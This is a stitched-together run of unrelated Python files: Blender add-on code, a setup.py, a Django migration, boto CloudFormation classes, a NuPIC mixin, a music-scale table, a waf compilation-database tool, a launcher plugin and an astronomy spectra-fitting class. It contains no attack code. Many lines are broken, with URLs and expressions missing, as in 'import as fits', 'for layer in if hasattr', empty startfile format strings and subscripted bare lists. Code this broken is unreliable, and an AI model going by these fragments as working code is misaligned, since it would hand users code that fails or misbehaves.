row = layout.row() row.prop(scene.bake_pbr_channels, "occlusion") row = layout.row() row.prop(scene.bake_pbr_channels, "normal") row = layout.row() row.prop(scene.bake_pbr_channels, "emit") row = layout.row() row.prop(scene.bake_pbr_channels, "roughness") row = layout.row() row.prop(scene.bake_pbr_channels, "opacity") row = layout.row() row.prop(scene.bake_pbr_channels, "albedo") row = layout.row() row.prop(scene.bake_pbr_channels, "sizex") row.prop(scene.bake_pbr_channels, "sizey") row = layout.row() row.prop(scene.bake_pbr_channels, "seltoact") # Big render button row = layout.row() row.scale_y = 2 row.operator("object.bake_pbr_maps") #__________________________________________________________________________________ bpy.types.Scene.bake_pbr_channels = bpy.props.PointerProperty(type=bakeChannels) bpy.utils.register_class(LayoutDemoPanel) bpy.utils.register_class(BakePbr)
#!/usr/bin/env python # OpenCenter(TM) is Copyright 2013 by Rackspace US, Inc. ############################################################################## # # OpenCenter is licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. This # version of OpenCenter includes Rackspace trademarks and logos, and in # accordance with Section 6 of the License, the provision of commercial # support services in conjunction with a version of OpenCenter which includes # Rackspace trademarks and logos is prohibited. OpenCenter source code and # details are available at: # or upon # written request. # # You may obtain a copy of the License at # and a copy, including this # notice, is available in the LICENSE file accompanying this software. # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the # specific language governing permissions and limitations # under the License. # ############################################################################## # # import os from setuptools import setup, find_packages def read(fname): return open(os.path.join(os.path.dirname(__file__), fname)).read() def find_files(path_tuples): output_array = [] for (path, destination) in path_tuples: if os.path.isdir(path): for d in os.walk(path): if len(d[2]) != 0: output_dir = d[0].replace(path, destination) output_files = ["%s/%s" % (d[0], x) for x in d[2]] output_array.append((output_dir, output_files)) else: output_array.append((destination, [path])) return output_array setup( name='opencenteragent', version='0.1', author='Rackspace US, Inc.', description=('Yet another pluggable, modular host agent'), license='Apache2', url='', long_description=read('README'), packages=find_packages(), data_files=find_files([['opencenteragent/plugins', 'share/opencenter-agent/plugins'], ['', 'bin']]) )
# -*- coding: utf-8 -*- # Generated by Django 1.11.16 on 2019-03-13 11:54 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('questions', '0041_data_migration'), ] operations = [ migrations.AlterField( model_name='catalog', name='comment', field=models.TextField(blank=True, help_text='Additional internal information about this catalog.', verbose_name='Comment'), ), migrations.AlterField( model_name='catalog', name='key', field=models.SlugField(blank=True, help_text='The internal identifier of this catalog.', max_length=128, verbose_name='Key'), ), migrations.AlterField( model_name='catalog', name='title_lang1', field=models.CharField(blank=True, help_text='The title for this catalog in the primary language.', max_length=256, verbose_name='Title (primary)'), ), migrations.AlterField( model_name='catalog', name='title_lang2', field=models.CharField(blank=True, help_text='The title for this catalog in the secondary language.', max_length=256, verbose_name='Title (secondary)'), ), migrations.AlterField( model_name='catalog', name='title_lang3', field=models.CharField(blank=True, help_text='The title for this catalog in the tertiary language.', max_length=256, verbose_name='Title (tertiary)'), ), migrations.AlterField( model_name='catalog', name='title_lang4', field=models.CharField(blank=True, help_text='The title for this catalog in the quaternary language.', max_length=256, verbose_name='Title (quaternary)'), ), migrations.AlterField( model_name='catalog', name='title_lang5', field=models.CharField(blank=True, help_text='The title for this catalog in the quinary language.', max_length=256, verbose_name='Title (quinary)'), ), migrations.AlterField( model_name='catalog', name='uri', field=models.URLField(blank=True, help_text='The Uniform Resource Identifier of this catalog (auto-generated).', max_length=640, verbose_name='URI'), ), migrations.AlterField( model_name='catalog', name='uri_prefix', field=models.URLField(blank=True, help_text='The prefix for the URI of this catalog.', max_length=256, verbose_name='URI Prefix'), ), migrations.AlterField( model_name='questionset', name='comment', field=models.TextField(blank=True, help_text='Additional internal information about this questionset.', verbose_name='Comment'), ), migrations.AlterField( model_name='questionset', name='help_lang1', field=models.TextField(blank=True, help_text='The help text for this questionset in the primary language.', verbose_name='Help (primary)'), ), migrations.AlterField( model_name='questionset', name='help_lang2', field=models.TextField(blank=True, help_text='The help text for this questionset in the secondary language.', verbose_name='Help (secondary)'), ), migrations.AlterField( model_name='questionset', name='help_lang3', field=models.TextField(blank=True, help_text='The help text for this questionset in the tertiary language.', verbose_name='Help (tertiary)'), ), migrations.AlterField( model_name='questionset', name='help_lang4', field=models.TextField(blank=True, help_text='The help text for this questionset in the quaternary language.', verbose_name='Help (quaternary)'), ), migrations.AlterField( model_name='questionset', name='help_lang5', field=models.TextField(blank=True, help_text='The help text for this questionset in the quinary language.', verbose_name='Help (quinary)'), ), migrations.AlterField( model_name='questionset', name='key', field=models.SlugField(blank=True, help_text='The internal identifier of this questionset.', max_length=128, verbose_name='Key'), ), migrations.AlterField( model_name='questionset', name='path', field=models.CharField(blank=True, help_text='The path part of the URI of this questionset (auto-generated).', max_length=512, verbose_name='Path'), ), migrations.AlterField( model_name='questionset', name='title_lang1', field=models.CharField(blank=True, help_text='The title for this questionset in the primary language.', max_length=256, verbose_name='Title (primary)'), ), migrations.AlterField( model_name='questionset', name='title_lang2', field=models.CharField(blank=True, help_text='The title for this questionset in the secondary language.', max_length=256, verbose_name='Title (secondary)'), ), migrations.AlterField( model_name='questionset', name='title_lang3', field=models.CharField(blank=True, help_text='The title for this questionset in the tertiary language.', max_length=256, verbose_name='Title (tertiary)'), ), migrations.AlterField( model_name='questionset', name='title_lang4', field=models.CharField(blank=True, help_text='The title for this questionset in the quaternary language.', max_length=256, verbose_name='Title (quaternary)'), ), migrations.AlterField( model_name='questionset', name='title_lang5', field=models.CharField(blank=True, help_text='The title for this questionset in the quinary language.', max_length=256, verbose_name='Title (quinary)'), ), migrations.AlterField( model_name='questionset', name='uri', field=models.URLField(blank=True, help_text='The Uniform Resource Identifier of this questionset (auto-generated).', max_length=640, verbose_name='URI'), ), migrations.AlterField( model_name='questionset', name='uri_prefix', field=models.URLField(blank=True, help_text='The prefix for the URI of this questionset.', max_length=256, verbose_name='URI Prefix'), ), migrations.AlterField( model_name='section', name='comment', field=models.TextField(blank=True, help_text='Additional internal information about this section.', verbose_name='Comment'), ), migrations.AlterField( model_name='section', name='key', field=models.SlugField(blank=True, help_text='The internal identifier of this section.', max_length=128, verbose_name='Key'), ), migrations.AlterField( model_name='section', name='path', field=models.CharField(blank=True, help_text='The path part of the URI of this section (auto-generated).', max_length=512, verbose_name='Label'), ), migrations.AlterField( model_name='section', name='title_lang1', field=models.CharField(blank=True, help_text='The title for this section in the primary language.', max_length=256, verbose_name='Title (primary)'), ), migrations.AlterField( model_name='section', name='title_lang2', field=models.CharField(blank=True, help_text='The title for this section in the secondary language.', max_length=256, verbose_name='Title (secondary)'), ), migrations.AlterField( model_name='section', name='title_lang3', field=models.CharField(blank=True, help_text='The title for this section in the tertiary language.', max_length=256, verbose_name='Title (tertiary)'), ), migrations.AlterField( model_name='section', name='title_lang4', field=models.CharField(blank=True, help_text='The title for this section in the quaternary language.', max_length=256, verbose_name='Title (quaternary)'), ), migrations.AlterField( model_name='section', name='title_lang5', field=models.CharField(blank=True, help_text='The title for this section in the quinary language.', max_length=256, verbose_name='Title (quinary)'), ), migrations.AlterField( model_name='section', name='uri', field=models.URLField(blank=True, help_text='The Uniform Resource Identifier of this section (auto-generated).', max_length=640, verbose_name='URI'), ), migrations.AlterField( model_name='section', name='uri_prefix', field=models.URLField(blank=True, help_text='The prefix for the URI of this section.', max_length=256, verbose_name='URI Prefix'), ), ]
from datetime import datetime from boto.resultset import ResultSet class Stack: def __init__(self, connection=None): self.connection = connection self.creation_time = None self.description = None self.disable_rollback = None self.notification_arns = [] self.outputs = [] self.parameters = [] self.stack_id = None self.stack_status = None self.stack_name = None self.stack_name_reason = None self.timeout_in_minutes = None def startElement(self, name, attrs, connection): if name == "Parameters": self.parameters = ResultSet([('member', Parameter)]) return self.parameters elif name == "Outputs": self.outputs = ResultSet([('member', Output)]) return self.outputs else: return None def endElement(self, name, value, connection): if name == 'CreationTime': self.creation_time = datetime.strptime(value, '%Y-%m-%dT%H:%M:%SZ') elif name == "Description": self.description = value elif name == "DisableRollback": self.disable_rollback = bool(value) elif name == "NotificationARNs": self.notification_arns = value elif name == 'StackId': self.stack_id = value elif name == 'StackName': self.stack_name = value elif name == 'StackStatus': self.stack_status = value elif name == "StackStatusReason": self.stack_status_reason = value elif name == "TimeoutInMinutes": self.timeout_in_minutes = int(value) elif name == "member": pass else: setattr(self, name, value) def delete(self): return self.connection.delete_stack(stack_name_or_id=self.stack_id) def describe_events(self, next_token=None): return self.connection.describe_stack_events( stack_name_or_id=self.stack_id, next_token=next_token ) def describe_resource(self, logical_resource_id): return self.connection.describe_stack_resource( stack_name_or_id=self.stack_id, logical_resource_id=logical_resource_id ) def describe_resources(self, logical_resource_id=None, physical_resource_id=None): return self.connection.describe_stack_resources( stack_name_or_id=self.stack_id, logical_resource_id=logical_resource_id, physical_resource_id=physical_resource_id ) def list_resources(self, next_token=None): return self.connection.list_stack_resources( stack_name_or_id=self.stack_id, next_token=next_token ) def update(self): rs = self.connection.describe_stacks(self.stack_id) if len(rs) == 1 and rs[0].stack_id == self.stack_id: self.__dict__.update(rs[0].__dict__) else: raise ValueError("%s is not a valid Stack ID or Name" % self.stack_id) def get_template(self): return self.connection.get_template(stack_name_or_id=self.stack_id) class StackSummary: def __init__(self, connection=None): self.connection = connection self.stack_id = None self.stack_status = None self.stack_name = None self.creation_time = None self.deletion_time = None self.template_description = None def startElement(self, name, attrs, connection): return None def endElement(self, name, value, connection): if name == 'StackId': self.stack_id = value elif name == 'StackStatus': self.stack_status = value elif name == 'StackName': self.stack_name = value elif name == 'CreationTime': self.creation_time = datetime.strptime(value, '%Y-%m-%dT%H:%M:%SZ') elif name == "DeletionTime": self.deletion_time = datetime.strptime(value, '%Y-%m-%dT%H:%M:%SZ') elif name == 'TemplateDescription': self.template_description = value elif name == "member": pass else: setattr(self, name, value) class Parameter: def __init__(self, connection=None): self.connection = None self.key = None self.value = None def startElement(self, name, attrs, connection): return None def endElement(self, name, value, connection): if name == "ParameterKey": self.key = value elif name == "ParameterValue": self.value = value else: setattr(self, name, value) def __repr__(self): return "Parameter:\"%s\"=\"%s\"" % (self.key, self.value) class Output: def __init__(self, connection=None): self.connection = connection self.description = None self.key = None self.value = None def startElement(self, name, attrs, connection): return None def endElement(self, name, value, connection): if name == "Description": self.description = value elif name == "OutputKey": self.key = value elif name == "OutputValue": self.value = value else: setattr(self, name, value) def __repr__(self): return "Output:\"%s\"=\"%s\"" % (self.key, self.value) class StackResource: def __init__(self, connection=None): self.connection = connection self.description = None self.logical_resource_id = None self.physical_resource_id = None self.resource_status = None self.resource_status_reason = None self.resource_type = None self.stack_id = None self.stack_name = None self.timestamp = None def startElement(self, name, attrs, connection): return None def endElement(self, name, value, connection): if name == "Description": self.description = value elif name == "LogicalResourceId": self.logical_resource_id = value elif name == "PhysicalResourceId": self.physical_resource_id = value elif name == "ResourceStatus": self.resource_status = value elif name == "ResourceStatusReason": self.resource_status_reason = value elif name == "ResourceType": self.resource_type = value elif name == "StackId": self.stack_id = value elif name == "StackName": self.stack_name = value elif name == "Timestamp": self.timestamp = datetime.strptime(value, '%Y-%m-%dT%H:%M:%SZ') else: setattr(self, name, value) def __repr__(self): return "StackResource:%s (%s)" % (self.logical_resource_id, self.resource_type) class StackResourceSummary: def __init__(self, connection=None): self.connection = connection self.last_updated_timestamp = None self.logical_resource_id = None self.physical_resource_id = None self.resource_status = None self.resource_status_reason = None self.resource_type = None def startElement(self, name, attrs, connection): return None def endElement(self, name, value, connection): if name == "LastUpdatedTimestamp": self.last_updated_timestampe = datetime.strptime(value, '%Y-%m-%dT%H:%M:%SZ') elif name == "LogicalResourceId": self.logical_resource_id = value elif name == "PhysicalResourceId": self.physical_resource_id = value elif name == "ResourceStatus": self.resource_status = value elif name == "ResourceStatusReason": self.resource_status_reason = value elif name == "ResourceType": self.resource_type = value else: setattr(self, name, value) def __repr__(self): return "StackResourceSummary:%s (%s)" % (self.logical_resource_id, self.resource_type) class StackEvent: valid_states = ("CREATE_IN_PROGRESS", "CREATE_FAILED", "CREATE_COMPLETE", "DELETE_IN_PROGRESS", "DELETE_FAILED", "DELETE_COMPLETE") def __init__(self, connection=None): self.connection = connection self.event_id = None self.logical_resource_id = None self.physical_resource_id = None self.resource_properties = None self.resource_status = None self.resource_status_reason = None self.resource_type = None self.stack_id = None self.stack_name = None self.timestamp = None def startElement(self, name, attrs, connection): return None def endElement(self, name, value, connection): if name == "EventId": self.event_id = value elif name == "LogicalResourceId": self.logical_resource_id = value elif name == "PhysicalResourceId": self.physical_resource_id = value elif name == "ResourceProperties": self.resource_properties = value elif name == "ResourceStatus": self.resource_status = value elif name == "ResourceStatusReason": self.resource_status_reason = value elif name == "ResourceType": self.resource_type = value elif name == "StackId": self.stack_id = value elif name == "StackName": self.stack_name = value elif name == "Timestamp": self.timestamp = datetime.strptime(value, '%Y-%m-%dT%H:%M:%SZ') else: setattr(self, name, value) def __repr__(self): return "StackEvent %s %s %s" % (self.resource_type, self.logical_resource_id, self.resource_status)
# ---------------------------------------------------------------------- # Numenta Platform for Intelligent Computing (NuPIC) # Copyright (C) 2019, Numenta, Inc. Unless you have an agreement # with Numenta, Inc., for a separate license for this software code, the # following terms and conditions apply: # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero Public License version 3 as # published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # See the GNU Affero Public License for more details. # # You should have received a copy of the GNU Affero Public License # along with this program. If not, see # # # ---------------------------------------------------------------------- class Regularize(object): def __init__(self, reg_schedule=None, downscale_reg_with_training_set=False, **kwargs): """ @param reg_schedule (dict) Mapping from epoch number to the reg_weight to use on that timestep and afterward. @param downscale_reg_with_training_set (bool) If True, multiply the regularization term by (1 / size_of_training_set) """ super().__init__(**kwargs) if downscale_reg_with_training_set: self.reg_coefficient = 1 / len(self.dataset_manager.get_train_dataset(0)) else: self.reg_coefficient = 1 if reg_schedule is None: self.reg_schedule = {} self.reg_weight = 1.0 else: self.reg_schedule = reg_schedule self.reg_weight = reg_schedule[0] def _regularization(self): reg = None # Perform accumulation on the device. for layer in if hasattr(layer, "regularization"): if reg is None: reg = layer.regularization() else: reg += layer.regularization() if reg is None: return 0 else: return (self.reg_weight * self.reg_coefficient * reg) def run_epoch(self, iteration): if iteration in self.reg_schedule: self.reg_weight = self.reg_schedule[iteration] return super().run_epoch(iteration)
""" Music Scales Source: Copyright (C) 2012 Alfred Farrugia This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <>. """ ACOUSTIC_SCALE = [0, 2, 4, 6, 7, 9, 10] ADONAI_MALAKH = [0, 2, 4, 5, 7, 8, 10] AEOLIAN_MODE = [0, 2, 3, 5, 7, 8, 10] ALGERIAN_SCALE = [0, 2, 3, 6, 7, 8, 11] ALTERED_SCALE = [0, 1, 3, 4, 6, 8, 10] AUGMENTED_SCALE = [0, 3, 4, 7, 8, 11] BEBOP_DOMINANT = [0, 2, 4, 5, 7, 9, 10, 11] BLUES_SCALE = [0, 3, 5, 6, 7, 10] DORIAN_MODE = [0, 2, 3, 5, 7, 9, 10] DOUBLE_HARMONIC_SCALE = [0, 1, 4, 5, 7, 8, 11] ENIGMATIC_SCALE = [0, 1, 4, 6, 8, 10, 11] FLAMENCO_MODE = [0, 1, 4, 5, 7, 8, 11] GYPSY_SCALE = [0, 2, 3, 6, 7, 8, 10] HALF_DIMINISHED_SCALE = [0, 2, 3, 5, 6, 8, 10] HARMONIC_MAJOR_SCALE = [0, 2, 4, 5, 7, 8, 11] HARMONIC_MINOR_SCALE = [0, 2, 3, 5, 7, 8, 11] HIRAJOSHI_SCALE = [0, 4, 6, 7, 11] HUNGARIAN_GYPSY_SCALE = [0, 2, 3, 6, 7, 8, 11] INSEN_SCALE = [0, 1, 5, 7, 10] IONIAN_MODE = [0, 2, 4, 5, 7, 9, 11] IWATO_SCALE = [0, 1, 5, 6, 11] LOCRIAN_MODE = [0, 1, 3, 5, 6, 8, 10] LYDIAN_AUGMENTED_SCALE = [0, 2, 4, 6, 8, 9, 11] LYDIAN_MODE = [0, 2, 4, 6, 7, 9, 11] MAJOR_LOCRIAN = [0, 2, 4, 5, 6, 8, 10] MELODIC_MINOR_SCALE = [0, 2, 3, 5, 7, 9, 11] MIXOLYDIAN_MODE = [0, 2, 4, 5, 7, 9, 10] NEAPOLITAN_MAJOR_SCALE = [0, 1, 3, 5, 7, 9, 11] NEAPOLITAN_MINOR_SCALE = [0, 1, 3, 5, 7, 8, 11] PERSIAN_SCALE = [0, 1, 4, 5, 6, 8, 11] PHRYGIAN_MODE = [0, 1, 3, 5, 7, 8, 10] PROMETHEUS_SCALE = [0, 2, 4, 6, 9, 10] TRITONE_SCALE = [0, 1, 4, 6, 7, 10] UKRAINIAN_DORIAN_SCALE = [0, 2, 3, 6, 7, 9, 10] WHOLE_TONE_SCALE = [0, 2, 4, 6, 8, 10] MAJOR = [0, 2, 4, 5, 7, 9, 11] MINOR = [0, 2, 3, 5, 7, 8, 10] """ Build a scale given an array s Example: to build a scale between 0 and 128 using the notes C, D, E buildScale([0,2,4],0,128) """ def buildScale(s, min_note=0, max_note=128): return [x + (12 * j) for j in range(12) for x in s if x + (12 * j) >= min_note and x + (12 * j) <= max_note]
# ##### BEGIN GPL LICENSE BLOCK ##### # # JewelCraft jewelry design toolkit for Blender. # Copyright (C) 2015-2019 Mikhail Rachinskiy # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <>. # # ##### END GPL LICENSE BLOCK ##### from bpy.types import Operator from bpy.props import IntProperty, FloatProperty, BoolProperty from .scatter_ui import UI from .scatter_func import Scatter class OBJECT_OT_jewelcraft_curve_scatter(UI, Scatter, Operator): bl_label = "JewelCraft Curve Scatter" bl_description = "Scatter selected object along active curve" bl_idname = "object.jewelcraft_curve_scatter" bl_options = {"REGISTER", "UNDO"} is_scatter = True number: IntProperty(name="Object Number", default=10, min=1, soft_max=100) rot_y: FloatProperty(name="Orientation", step=10, unit="ROTATION") rot_z: FloatProperty(name="Rotation", step=10, unit="ROTATION") loc_z: FloatProperty(name="Position", unit="LENGTH") start: FloatProperty(name="Start") end: FloatProperty(name="End", default=100.0) use_absolute_offset: BoolProperty(name="Absolute Offset") spacing: FloatProperty(name="Spacing", default=0.2, unit="LENGTH") class OBJECT_OT_jewelcraft_curve_redistribute(UI, Scatter, Operator): bl_label = "JewelCraft Curve Redistribute" bl_description = "Redistribute selected objects along curve" bl_idname = "object.jewelcraft_curve_redistribute" bl_options = {"REGISTER", "UNDO"} is_scatter = False rot_y: FloatProperty(name="Orientation", step=10, unit="ROTATION", options={"SKIP_SAVE"}) rot_z: FloatProperty(name="Rotation", step=10, unit="ROTATION", options={"SKIP_SAVE"}) loc_z: FloatProperty(name="Position", unit="LENGTH", options={"SKIP_SAVE"}) start: FloatProperty(name="Start") end: FloatProperty(name="End", default=100.0) use_absolute_offset: BoolProperty(name="Absolute Offset", options={"SKIP_SAVE"}) spacing: FloatProperty(name="Spacing", default=0.2, unit="LENGTH")
#!/usr/bin/env python # encoding: utf-8 # Christoph Koke, 2013 # Original source: waflib/extras/ from # waf git 15d14c7bdf2e (New BSD License) """ Writes the c and cpp compile commands into build/compile_commands.json see Usage: def configure(conf): conf.load('compiler_cxx') ... conf.load('clang_compilation_database') """ import sys, os, json, shlex, pipes from waflib import Logs, TaskGen from waflib.Tools import c, cxx if sys.hexversion >= 0x3030000: quote = shlex.quote else: quote = pipes.quote @TaskGen.feature('*') @TaskGen.after_method('process_use') def collect_compilation_db_tasks(self): "Add a compilation database entry for compiled tasks" try: clang_db = self.bld.clang_compilation_database_tasks except AttributeError: clang_db = self.bld.clang_compilation_database_tasks = [] self.bld.add_post_fun(write_compilation_database) for task in getattr(self, 'compiled_tasks', []): if isinstance(task, (c.c, cxx.cxx)): clang_db.append(task) def write_compilation_database(ctx): "Write the clang compilation database as JSON" database_file = ctx.bldnode.make_node('compile_commands.json')"Build commands will be stored in %s" % database_file.path_from(ctx.path)) try: root = json.load(database_file) except IOError: root = [] clang_db = dict((x["file"], x) for x in root) for task in getattr(ctx, 'clang_compilation_database_tasks', []): try: cmd = task.last_cmd except AttributeError: continue directory = getattr(task, 'cwd', ctx.variant_dir) f_node = task.inputs[0] filename = os.path.relpath(f_node.abspath(), directory) cmd = " ".join(map(quote, cmd)) entry = { "directory": directory, "command": cmd, "file": filename, } clang_db[filename] = entry root = list(clang_db.values()) database_file.write(json.dumps(root, indent=2))
# -*- coding: utf-8 -*- ''' pyLauncher: Windows Application Launcher Copyright (C) Blaga Florentin Gabriel This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <>. ''' import os info = {"name" : "pyLWeb", "author" : "Blaga Florentin Gabriel <>", "category": "pylSearchExtensions", "version": "1.0", "class" : "execWebSearch"} class execWebSearch(): def parseQuery(self, query): query = query.split() args = query[1:] if query: if query[0] == "google": os.startfile("" % " ".join(args)) elif query[0] == "wikipedia": os.startfile("" % " ".join(args)) elif query[0] == "youtube": os.startfile("" % " ".join(args)) else: pass
""" .. moduleauthor:: Johan Comparat <> General purpose: ................ The class ModelSpectraStacks is dedicated to modelling and extracting information from stacks of spectra. *Imports*:: import matplotlib matplotlib.use('pdf') import matplotlib.pyplot as p import os import astropy.cosmology as co cosmo=co.FlatLambdaCDM(H0=70,Om0=0.3) import astropy.units as u import as fits import numpy as n from scipy.optimize import curve_fit from scipy.interpolate import interp1d from scipy.stats import scoreatpercentile import as fits from lineListAir import * import LineFittingLibrary as lineFit """ import matplotlib matplotlib.use('pdf') import matplotlib.pyplot as p import os from os.path import join import astropy.cosmology as co cosmo=co.Planck13 #co.FlatLambdaCDM(H0=70,Om0=0.3) import astropy.units as u import as fits import numpy as n from scipy.optimize import curve_fit from scipy.interpolate import interp1d from scipy.stats import scoreatpercentile import as fits from lineListVac import * allLinesList = n.array([ [Ne3,Ne3_3869,"Ne3_3869","left"], [Ne3,Ne3_3968,"Ne3_3968","left"], [O3,O3_4363,"O3_4363","right"], [O3,O3_4960,"O3_4960","left"], [O3,O3_5007,"O3_5007","right"], [H1,H1_3970,"H1_3970","right"], [H1,H1_4102,"H1_4102","right"], [H1,H1_4341,"H1_4341","right"], [H1,H1_4862,"H1_4862","left"]]) # other lines that are optional # [N2,N2_6549,"N2_6549","left"], [N2,N2_6585,"N2_6585","right"] , [H1,H1_6564,"H1_6564","left"] # , [S2,S2_6718,"S2_6718","left"], [S2,S2_6732,"S2_6732","right"], [Ar3,Ar3_7137,"Ar3_7137","left"], [H1,H1_1216,"H1_1216","right"] doubletList = n.array([[O2_3727,"O2_3727",O2_3729,"O2_3729",O2_mean]]) # import the fitting routines import LineFittingLibrary as lineFit #O2a=3727.092 #O2b=3729.875 #O2=(O2a+O2b)/2. #Hg=4102.892 #Hd=4341.684 #Hb=4862.683 #O3a=4960.295 #O3b=5008.240 #Ha=6564.61 fnu = lambda mAB : 10**(-(mAB+48.6)/2.5) # erg/cm2/s/Hz flambda= lambda mAB, ll : 10**10 * c*1000 * fnu(mAB) / ll**2. # erg/cm2/s/A kla=lambda ll :2.659 *(-2.156+1.509/ll-0.198/ll**2+0.011/ll**3 ) + 4.05 klb=lambda ll :2.659 *(-1.857+1.040/ll)+4.05 def kl(ll): """Calzetti extinction law""" if ll>6300: return klb(ll) if ll<=6300: return kla(ll) class ModelSpectraStacks: """ This class fits the emission lines on the continuum-subtracted stack. :param stack_file: fits file generated with a LF in a luminosity bin. :param cosmo: cosmology class from astropy :param firefly_min_wavelength: minimum wavelength considered by firefly (default : 1000) :param firefly_max_wavelength: minimum wavelength considered by firefly (default : 7500) :param dV: default value that hold the place (default : -9999.99) :param N_spectra_limitFraction: If the stack was made with N spectra. N_spectra_limitFraction selects the points that have were computed using more thant N_spectra_limitFraction * N spectra. (default : 0.8) """ def __init__(self, stack_file, model_file, mode="MILES", cosmo=cosmo, firefly_min_wavelength= 1000., firefly_max_wavelength=7500., dV=-9999.99, N_spectra_limitFraction=0.8, tutorial = False, eboss_stack = False): self.stack_file = stack_file self.stack_file_base = os.path.basename(stack_file)[:-5] self.lineName = self.stack_file_base[:7] self.stack_model_file = model_file self.mode = mode self.tutorial = tutorial self.eboss_stack = eboss_stack # retrieves the firefly model for the stack: stack_model_file """ if self.mode=="MILES": self.stack_model_file = join( os.environ['SPECTRASTACKS_DIR'], "fits", self.lineName, self.stack_file_base + "-SPM-MILES.fits") if self.mode=="STELIB": self.stack_model_file = join( os.environ['SPECTRASTACKS_DIR'], "fits", self.lineName, self.stack_file_base + "-SPM-STELIB.fits") """ if self.tutorial : self.stack_model_file = join( os.environ['DATA_DIR'], "ELG-composite", self.stack_file_base + "-SPM-MILES.fits") if self.mode=="EBOSS": #eboss_stack : self.stack_model_file = join(os.environ['EBOSS_TARGET'],"elg", "tests", "stacks", "fits", self.stack_file_base[:-6]+ "-SPM-MILES.fits") self.redshift = 0.85 else : self.redshift = float(self.stack_file_base.split('-')[2].split('_')[0][1:]) self.cosmo = cosmo self.firefly_max_wavelength = firefly_max_wavelength self.firefly_min_wavelength = firefly_min_wavelength self.dV = dV self.side = '' self.N_spectra_limitFraction = N_spectra_limitFraction # define self.sphereCM, find redshift ... sphere=4*n.pi*( self.cosmo.luminosity_distance(self.redshift) )**2.**2) self.hdus = self.hdR = self.hdus[0].header self.hdu1 = self.hdus[1] # .data print "Loads the data." #print if self.tutorial : wlA, flA, flErrA =['WAVE'][0],['FLUXMEDIAN'][0]*10**(-17),['FLUXMEDIAN_ERR'][0]*10**(-17) self.selection = (flA>0) self.wl,self.fl,self.flErr = wlA[self.selection], flA[self.selection], flErrA[self.selection] self.stack=interp1d(self.wl,self.fl) self.stackErr=interp1d(self.wl,self.flErr) # loads model : hdus = self.hdu2 = hdus[1] # .data self.wlModel,self.flModel =['wavelength'],['firefly_model']*10**(-17) self.model=interp1d(n.hstack((self.wlModel,[n.max(self.wlModel)+10,11000])), n.hstack(( self.flModel, [n.median(self.flModel[:-20]),n.median(self.flModel[:-20])] )) ) # wavelength range common to the stack and the model : self.wlLineSpectrum = n.arange(n.max([self.stack.x.min(),self.model.x.min()]), n.min([self.stack.x.max(),self.model.x.max()]), 0.5)[2:-1] self.flLineSpectrum=n.array([self.stack(xx)-self.model(xx) for xx in self.wlLineSpectrum]) self.fl_frac_LineSpectrum=n.array([self.stack(xx)/self.model(xx) for xx in self.wlLineSpectrum]) self.flErrLineSpectrum=self.stackErr(self.wlLineSpectrum) elif eboss_stack : print wlA,flA,flErrA =['wavelength'],['meanWeightedStack']*10**(-17),['jackknifStackErrors'] * 10**(-17) self.selection = (flA>0) self.wl,self.fl,self.flErr = wlA[self.selection], flA[self.selection], flErrA[self.selection] self.stack=interp1d(self.wl,self.fl) self.stackErr=interp1d(self.wl,self.flErr) # loads model : hdus = self.hdu2 = hdus[1] # .data self.wlModel,self.flModel =['wavelength'],['firefly_model']*10**(-17) self.model=interp1d(n.hstack((self.wlModel,[n.max(self.wlModel)+10,11000])), n.hstack(( self.flModel, [n.median(self.flModel[:-20]),n.median(self.flModel[:-20])] )) ) # wavelength range common to the stack and the model : self.wlLineSpectrum = n.arange(n.max([self.stack.x.min(),self.model.x.min()]), n.min([self.stack.x.max(),self.model.x.max()]), 0.5)[2:-1] self.flLineSpectrum=n.array([self.stack(xx)-self.model(xx) for xx in self.wlLineSpectrum]) self.fl_frac_LineSpectrum=n.array([self.stack(xx)/self.model(xx) for xx in self.wlLineSpectrum]) self.flErrLineSpectrum=self.stackErr(self.wlLineSpectrum) else: wlA,flA,flErrA =['wavelength'],['meanWeightedStack'],['jackknifStackErrors'] self.selection = (flA>0) & (['NspectraPerPixel'] > float( self.stack_file.split('_')[-5]) * self.N_spectra_limitFraction ) self.wl,self.fl,self.flErr = wlA[self.selection], flA[self.selection], flErrA[self.selection] self.stack=interp1d(self.wl,self.fl) self.stackErr=interp1d(self.wl,self.flErr) # loads model : hdus = self.hdu2 = hdus[1] # .data self.wlModel,self.flModel =['wavelength'],['firefly_model']*10**(-17) self.model=interp1d(n.hstack((self.wlModel,[n.max(self.wlModel)+10,11000])), n.hstack(( self.flModel, [n.median(self.flModel[:-20]),n.median(self.flModel[:-20])] )) ) # wavelength range common to the stack and the model : self.wlLineSpectrum = n.arange(n.max([self.stack.x.min(),self.model.x.min()]), n.min([self.stack.x.max(),self.model.x.max()]), 0.5)[2:-1] self.flLineSpectrum=n.array([self.stack(xx)-self.model(xx) for xx in self.wlLineSpectrum]) self.fl_frac_LineSpectrum=n.array([self.stack(xx)/self.model(xx) for xx in self.wlLineSpectrum]) self.flErrLineSpectrum=self.stackErr(self.wlLineSpectrum) 